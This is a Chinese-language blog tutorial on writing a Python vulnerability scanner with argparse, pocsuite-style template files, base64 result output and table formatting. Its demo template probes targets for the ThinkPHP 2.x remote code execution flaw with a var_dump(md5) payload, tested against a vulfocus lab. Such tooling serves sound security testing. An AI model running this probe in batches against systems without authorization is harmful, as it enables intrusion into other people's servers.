从零构建:我的漏洞扫描器之旅
从零构建自己的漏洞扫描器。为满足大家的期待,先给大家看一下最后的效果。
接下来构建属于自己的漏洞扫描器,首先漏洞扫描器要有几个硬性需求。
- 可以批量扫描
- 模板文件具有通用性
- 结果直观
设计研究
先设计扫描器的大体框架,扫描的入口,主要从来命令行中接受用户输入的参数
这里设计三个点
1、-u
单个url扫描
2、-f
指定文件批量扫描
3、-t
指定扫描模板文件
下面是实现代码
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="漏洞扫描工具。")
parser.add_argument('-u','--url',type=str,help='单个目标扫描。')
parser.add_argument('-f', '--file', type=str, help='多目标批量扫描。')
parser.add_argument('-t', '--template', type=str, help='指定扫描模板文件。')
args = parser.parse_args()
if '-u' in sys.argv and '-t' in sys.argv:
pass
elif '-f' in sys.argv and '-t' in sys.argv:
pass
else:
pass
接下来就是最重要的一点,扫描的模板文件,这里我们参考pocsuite
来设计
import datetime
from urllib.parse import urljoin
import requests
from PublicMethod import host_to_ip
from PublicMethod import success
#漏洞扫描模板文件
class vul_scan:
def __init__(self):
pass
def vul_name(url):
protocol, ip_address, port = host_to_ip.normalize_and_parse_url(url,host_to_ip=False)
target = f'{protocol}://{ip_address}:{port}'
#定义漏洞信息,初始漏洞结果False,这里只需要更改name
result = {
'name': '漏洞名称',
'vulnerable' :False,
'method': 'None',
'url': url,
'payload': 'None'
}
try:
#向目标发起检测请求,这里需要自定义修改
headers = {
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
}
uri = ''
target = urljoin(target, uri)
response = requests.get(url=target, headers=headers, timeout=5, verify=False)
#漏洞触发条件
if True:
result['vulnerable'] = True
result['method'] = 'POST'
result['url'] = url
result['payload'] = uri
success.VulExist(result)
return result
else:
return result
except Exception as e:
return result
#调用的主入口
def start_scan(self):
return vul_scan.vul_name(self) #thinkphp_2x_rce名称后面可以自己自定义,但vul_scan是不变的
看到这里导入了两个文件host_to_ip
, success
。host_to_ip
是对用户传入的url进行处理,success
是在成功触发漏洞后将漏洞详情进行base64编码再输出。
success
import base64
from colorama import init, Fore, Style
def VulExist(data):
data = str(data)
# 初始化colorama
init(autoreset=True)
# 将数据编码为字节(如果它还不是字节)
if isinstance(data, str):
data_bytes = data.encode('utf-8')
else:
data_bytes = data
# 对数据进行Base64编码
encoded_bytes = base64.b64encode(data_bytes)
# 将编码后的字节转换为字符串(为了输出)
encoded_str = encoded_bytes.decode('utf-8')
# 输出编码后的字符串
print(Fore.CYAN + encoded_str)
# 如果你想要在输出后重置颜色,确保init(autoreset=True)已经被调用,
# 或者在打印后手动添加Style.RESET_ALL
# print(Style.RESET_ALL) # 这行通常不需要,因为我们已经设置了autoreset=True
host_to_ip
from urllib.parse import urlparse, urlunparse
import socket
def normalize_and_parse_url(url, host_to_ip=False):
# 如果URL没有协议,则默认添加http://
if not url.startswith(('http://', 'https://')):
url = 'http://' + url if '://' not in url else url # 简单处理,假设没有://则一定是http
# 注意:这里做了一个简化的假设,即如果没有://则一定是http,这在实际中可能不准确。
# 更健壮的做法是检查url是否以www.开头,但这样也可能有误判。
# 更好的做法可能是要求用户输入完整的URL或提供额外的参数来指定协议。
# 这里为了示例简单起见,我们采用这个简化的方法。
# 但是,上面的逻辑有一个问题:如果url已经是完整的比如http://www.example.com,它会被错误地改为http://http://www.example.com。
# 因此,我们需要更精确地检查并只添加当缺少协议时。
if '://' not in url:
url = 'http://' + url
# 使用 urlparse 解析 URL
parsed_url = urlparse(url)
# 提取协议(此时应该已经有了)
protocol = parsed_url.scheme
# 提取主机名(可能是 IP 地址或域名)
host = parsed_url.hostname
# 提取端口号,如果没有指定端口,则使用默认值
port = parsed_url.port or 80 # 默认HTTP端口是80
# 如果协议是https但端口是80(由于默认添加http://可能导致的问题),则更正端口为443(但这通常不会发生,因为我们已经添加了协议)
# 注意:这里的逻辑其实是不必要的,因为我们已经在上面确保了URL有协议。但为了完整性,我还是保留了注释。
# if protocol == 'https' and port == 80:
# port = 443 # 但这通常不会发生在我们当前的逻辑下,因为我们已经通过添加协议确保了正确的端口(如果有的话)
# 如果 host_to_ip 为 True,则尝试将主机名解析为 IP 地址
if host_to_ip:
try:
ip_address = socket.gethostbyname(host)
except socket.gaierror:
# 如果主机名无法解析为 IP 地址,则抛出异常
raise ValueError(f"Cannot resolve hostname {host} to an IP address")
else:
# 否则,直接使用主机名
ip_address = host
# 注意:这里没有重新构造完整的URL,因为我们的目的是提取信息,而不是修改URL。
# 如果需要构造一个新的URL,可以使用urlunparse()函数与修改后的组件。
return protocol, ip_address, port
if __name__ == '__main__':
# 示例使用
urls = [
"192.168.159.129:46676",
"http://example.com:8080",
"https://192.168.1.1",
"ftp://should_fail.com" # 这个将不会被正确处理,因为我们只处理http和https
]
for url in urls:
try:
protocol, ip, port = normalize_and_parse_url(url)
print(f"URL: {url}")
print(f"Protocol: {protocol}")
print(f"IP Address/Hostname: {ip}")
print(f"Port: {port}")
print('-' * 40)
except ValueError as e:
print(e)
print('-' * 40)
接下来就是要在主入口中调用模板文件,现在有个问题,批量扫描的时候是不是要多次加载模板文件,这样虽然也可以执行,但效率不高。我们可以定义一个全局变量缓存模块,再来调用避免重复加载损失性能。
def load_module(module_path):
global cached_module
if cached_module is None:
# 加载指定的Python模块
module_name = module_path.replace('.py', '').split('/')[-1] # 获取模块名,不包含路径和扩展名
spec = importlib.util.spec_from_file_location(module_name, module_path)
cached_module = importlib.util.module_from_spec(spec)
sys.modules[module_name] = cached_module # 注册模块
spec.loader.exec_module(cached_module) # 执行模块
return cached_module
def call_start_scan(module, url):
if hasattr(module, 'start_scan'):
return module.start_scan(url) # 调用 start_scan 函数并传入 URL 参数
else:
print(f"Function 'start_scan' not found in the module.")
最后还有一个漂亮的表格输出
这里大家开头也看到了,上面我们把漏洞详情return
了,只要把结果传入就行。
from prettytable import PrettyTable
from termcolor import colored
def FormatOutput(data_list):
# 多个数据字典(以用户提供的顺序)
# data_list = [
# {'name': 'thinkphp_2x_rce', 'vulnerable': True, 'method': 'POST', 'url': '192.168.159.129:16963',
# 'payload': '?s=/sec/test/00/${var_dump(md5(9527))}'}
# ]
# 创建表格对象
table = PrettyTable()
# 获取字段名,确保vulnerable在最后
table.field_names = ['name', 'method', 'url', 'payload', 'vulnerable']
# 使用termcolor的colored方法为列名加粗
table.field_names = [colored(field, attrs=['bold']) for field in table.field_names]
# 添加每一行数据
for index, data in enumerate(data_list):
row_values = [data['name'], data['method'], data['url'], data['payload'], data['vulnerable']]
# 根据vulnerable的值给出不同的颜色
vulnerable_value = data['vulnerable']
if vulnerable_value:
row_values[4] = colored('True', 'green')
else:
row_values[4] = colored('False', 'red')
# 添加数据行
table.add_row(row_values)
# 如果不是最后一行,添加虚线分隔符
if index < len(data_list) - 1:
table.add_row(['-' * len(field) for field in table.field_names])
# 打印表格
print(table)
现在功能都完成了,最后就是组装,再从入口优化一下
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="漏洞扫描工具。")
parser.add_argument('-u','--url',type=str,help='单个目标扫描。')
parser.add_argument('-f', '--file', type=str, help='多目标批量扫描。')
parser.add_argument('-t', '--template', type=str, help='指定扫描模板文件。')
args = parser.parse_args()
if '-u' in sys.argv and '-t' in sys.argv:
data_list = []
# 加载模块并缓存
module = load_module(args.template)
data = call_start_scan(module, args.url)
data_list.append(data)
FormatOutput.FormatOutput(data_list)
elif '-f' in sys.argv and '-t' in sys.argv:
try:
data_list = []# 加载模块并缓存
module = load_module(args.template)
with open(args.file, 'r') as files:
file = [line.strip() for line in files if line.strip()]
for url in file:
data = call_start_scan(module, url)
data_list.append(data)
FormatOutput.FormatOutput(data_list)
except Exception as e:
pass
else:
pass
效果验证
现在来验证一下,这里我们用thinkphp_2x_rce
漏洞来演示,靶场就使用vulfocus
。
这里漏洞模板编写直接通过上面的模板修改就行。直接来看修改后的结果。
import datetime
from urllib.parse import urljoin
import requests
from PublicMethod import host_to_ip
from PublicMethod import success
#漏洞扫描模板文件
class vul_scan:
def __init__(self):
pass
def thinkphp_2x_rce(url):
protocol, ip_address, port = host_to_ip.normalize_and_parse_url(url,host_to_ip=False)
target = f'{protocol}://{ip_address}:{port}'
#定义漏洞信息,初始漏洞结果False,这里只需要更改name
result = {
'name': 'thinkphp_2x_rce',
'vulnerable' :False,
'method': 'None',
'url': url,
'payload': 'None'
}
try:
#向目标发起检测请求,这里需要自定义修改
headers = {
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
}
uri = '?s=/sec/test/00/${var_dump(md5(9527))}'
target = urljoin(target, uri)
response = requests.get(url=target, headers=headers, timeout=5, verify=False)
#漏洞结果匹配,符合将漏洞结果设置为True,并添加漏洞详情返回
if '52569c045dc348f12dfc4c85000ad832' in response.text:
result['vulnerable'] = True
result['method'] = 'POST'
result['url'] = url
result['payload'] = uri
success.VulExist(result)
return result
else:
return result
except Exception as e:
return result
#调用的主入口
def start_scan(self):
return vul_scan.thinkphp_2x_rce(self) #thinkphp_2x_rce名称后面可以自己自定义,但vul_scan是不变的
下面来看看效果
单url测试
多目标批量扫描
优化
有几个优化的点大家可以自己去修改:
- 使用多线程提高效率
- 不指定模板时设置默认扫描的模板
- 一次指定多个模板文件
- 添加
-p
参数设置代理便于分析
1 条评论
可输入 255 字